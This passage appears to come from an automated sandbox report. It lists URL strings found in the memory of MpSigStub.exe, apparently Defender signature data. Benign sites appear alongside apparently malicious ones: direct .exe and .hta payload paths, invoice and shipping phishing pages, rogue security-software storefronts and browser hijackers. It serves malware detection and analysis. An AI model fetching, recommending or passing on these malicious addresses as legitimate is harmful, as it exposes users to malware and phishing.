Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.mt-download.com/mtrslib2.js
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.mva.by/tags/ariscanin1.e
Source: MpSigStub.exe, 00000023.00000003.6345763717.0000028BD65BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.mvps.org/vb
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.my8899.com/
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000023.00000003.6279726781.0000028BD6C0C000.00000004.00000001.sdmp	String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.mymediacenter.in/crime/index.php
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp	String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.namu-in.com//bbs/data/init.htm
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.natwest.com/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: http://www.naver.com
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.nba.com
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.nerddogueto.com.br
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.netscape.com
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.niepicowane.pl/
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.norton-kaspersky.com/trf/tools
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000023.00000003.6267730911.0000028BD756A000.00000004.00000001.sdmp	String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.nytimes.com
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.o2.co.uk/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://www.ooooos.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp	String found in binary or memory: http://www.paqtool.com/product/keylog/keylog_
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.pardislab.com/ups-us/feb-12-18-04-16-13/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pasillorosa.com/
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.pc-tune.ch/getip.php
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	String found in binary or memory: http://www.pdefender2009.com/buy.php
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.plattemedia.com/links/site
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.platteregistrations.com/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.plattevalidation.com/
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.plattevalidation.com/a
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornhub.com/
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp	String found in binary or memory: http://www.powerdomein.nl/nld/administrator/backups/firewallc.exe
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pp1234.net/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://www.pppp123456.cn/welcome.php?k=
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pricemeter.net/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pricemeter.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://www.profilestylez.com
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.prostol.com/m.html
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.public.health.wa.gov.au/3/1428/2/apply_to_install_a_wastewater_system.pm
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq5.com
Source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://www.radpdf.com
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://www.rakehunter.com/o/file.hta
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://www.rezababy.blogfa.com
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.rits.ga/excel/view.php
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://www.ritservice.rua
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.sacbarao.kinghost.net/
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000023.00000003.6324018589.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000023.00000003.6318934861.0000028BD62E5000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sniperspy.com/guide.html
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp	String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.soporteczamora.com/ups-ship-notification/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://www.sotrag.eu/invoice
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp	String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.sqwire.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
Source: MpSigStub.exe, 00000023.00000003.6319962733.0000028BD6878000.00000004.00000001.sdmp	String found in binary or memory: http://www.start-space.com/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.steelbendersrfq.cf/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp	String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.surprisingdd.top
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://www.symantec.com
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmp	String found in binary or memory: http://www.systweak.com/registrycleaner
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://www.tagbao.com/open
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://www.taktuk.tk
Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmp	String found in binary or memory: http://www.tangosearch.com/
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://www.tattoopower.it/invoice-
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://www.tazbao.com/setup-
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://www.tempuri.org/DataSet1.xsd
Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebestofnet.com/exit/
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.thedomaindata.com/
Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp	String found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	String found in binary or memory: http://www.thehun.com/
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	String found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://www.thon-samson.be/js/_notes/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiandy.com/rechnung-
Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp	String found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiexue.net/
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://www.tijuanalaw.com/
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://www.tq121.com.cn/
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp	String found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	String found in binary or memory: http://www.traramayeri.net
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://www.tripod.com
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://www.trotux.com/?z=
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	String found in binary or memory: http://www.tubedigger.com
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.turtlecoin.lol
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp	String found in binary or memory: http://www.universal101.com/upd
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://www.up.com.jo/gov/lsass.exe
Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmp	String found in binary or memory: http://www.update-srv.info
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://www.update-srv1.info
